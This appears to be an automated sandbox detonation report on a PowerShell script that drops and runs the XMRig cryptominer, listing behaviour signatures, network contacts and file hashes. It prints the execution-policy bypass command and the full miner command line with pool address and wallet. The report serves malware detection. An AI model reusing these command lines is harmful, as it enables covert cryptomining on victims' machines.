memory/4404-111-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-112-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-113-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-114-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-115-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-116-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-117-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
memory/4404-118-0x00007FF6E5AD0000-0x00007FF6E6703000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4440 wrote to memory of 2176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4440 wrote to memory of 2176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/4440-0-0x00007FFD4C3B3000-0x00007FFD4C3B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_54bgl4sk.n1t.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4440-9-0x00000264FA280000-0x00000264FA2A2000-memory.dmp
memory/4440-10-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp
memory/4440-11-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp
memory/4440-12-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp
memory/4440-14-0x00000264FA750000-0x00000264FA762000-memory.dmp
memory/4440-15-0x00000264FA2D0000-0x00000264FA2DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2176-46-0x00000191C2240000-0x00000191C2260000-memory.dmp
memory/2176-47-0x00000191C2280000-0x00000191C22A0000-memory.dmp
memory/2176-48-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-53-0x00000191C22C0000-0x00000191C22E0000-memory.dmp
memory/2176-52-0x00000191C22A0000-0x00000191C22C0000-memory.dmp
memory/4440-51-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp
memory/2176-49-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/4440-50-0x00007FFD4C3B3000-0x00007FFD4C3B5000-memory.dmp
memory/2176-54-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-55-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-56-0x00000191C22A0000-0x00000191C22C0000-memory.dmp
memory/2176-57-0x00000191C22C0000-0x00000191C22E0000-memory.dmp
memory/2176-58-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-59-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-60-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-61-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-62-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-63-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-64-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-65-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-66-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-67-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-68-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-69-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-70-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-71-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-72-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-73-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-74-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-75-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-76-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-77-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-78-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-79-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-80-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-81-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-82-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-83-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-84-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-85-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-86-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-87-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-88-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-89-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-90-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-91-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-92-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-93-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-94-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-95-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-96-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-97-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-98-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-99-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-100-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-101-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-102-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-103-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-104-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-105-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-106-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-107-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-108-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-109-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-110-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-111-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-112-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-113-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-114-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-115-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
memory/2176-116-0x00007FF6E7D40000-0x00007FF6E8973000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2100 wrote to memory of 2952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2100 wrote to memory of 2952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
Files
memory/2100-2-0x00007FFCC9C13000-0x00007FFCC9C14000-memory.dmp
memory/2100-5-0x0000018DC4D80000-0x0000018DC4DA2000-memory.dmp
memory/2100-8-0x00007FFCC9C10000-0x00007FFCCA5FC000-memory.dmp
memory/2100-9-0x0000018DC4F30000-0x0000018DC4FA6000-memory.dmp
memory/2100-10-0x00007FFCC9C10000-0x00007FFCCA5FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3ijdib3.a0q.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2100-26-0x00007FFCC9C10000-0x00007FFCCA5FC000-memory.dmp
memory/2100-49-0x0000018DC4F10000-0x0000018DC4F22000-memory.dmp
memory/2100-62-0x0000018DC4F00000-0x0000018DC4F0A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2952-91-0x00000227F5C00000-0x00000227F5C20000-memory.dmp
memory/2952-92-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-93-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2100-94-0x00007FFCC9C13000-0x00007FFCC9C14000-memory.dmp
memory/2100-95-0x00007FFCC9C10000-0x00007FFCCA5FC000-memory.dmp
memory/2100-96-0x00007FFCC9C10000-0x00007FFCCA5FC000-memory.dmp
memory/2952-97-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-98-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-99-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-100-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-101-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-102-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-103-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-104-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-105-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-106-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-107-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-108-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-109-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-110-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-111-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-112-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-113-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-114-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-115-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-116-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-117-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-118-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-119-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-120-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-121-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-122-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-123-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-124-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-125-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-126-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-127-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-128-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-129-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-130-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-131-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-132-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-133-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-134-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-135-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-136-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-137-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-138-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-139-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-140-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-141-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-142-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-143-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-144-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-145-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-146-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-147-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-148-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-149-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-150-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-151-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-152-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-153-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-154-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-155-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-156-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
memory/2952-157-0x00007FF751990000-0x00007FF7525C3000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:43
Platform
win7-20240221-en
Max time kernel
1561s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
Network
Files
memory/360-4-0x000007FEF5B7E000-0x000007FEF5B7F000-memory.dmp
memory/360-7-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/360-8-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/360-10-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/360-9-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/360-6-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/360-5-0x000000001B710000-0x000000001B9F2000-memory.dmp
memory/360-11-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/360-12-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:43
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2888 wrote to memory of 3372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2888 wrote to memory of 3372 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
Files
memory/2888-0-0x00007FFB98E13000-0x00007FFB98E15000-memory.dmp
memory/2888-1-0x0000029AECD40000-0x0000029AECD62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d3mn45kq.ypl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2888-11-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/2888-12-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/2888-14-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/2888-15-0x0000029AED240000-0x0000029AED252000-memory.dmp
memory/2888-16-0x0000029AED010000-0x0000029AED01A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3372-47-0x000001A0E6B90000-0x000001A0E6BB0000-memory.dmp
memory/3372-48-0x000001A0E84A0000-0x000001A0E84C0000-memory.dmp
memory/3372-49-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/2888-50-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/2888-51-0x00007FFB98E13000-0x00007FFB98E15000-memory.dmp
memory/3372-52-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-55-0x000001A0E84E0000-0x000001A0E8500000-memory.dmp
memory/3372-54-0x000001A0E84C0000-0x000001A0E84E0000-memory.dmp
memory/2888-53-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/2888-57-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/3372-56-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-58-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
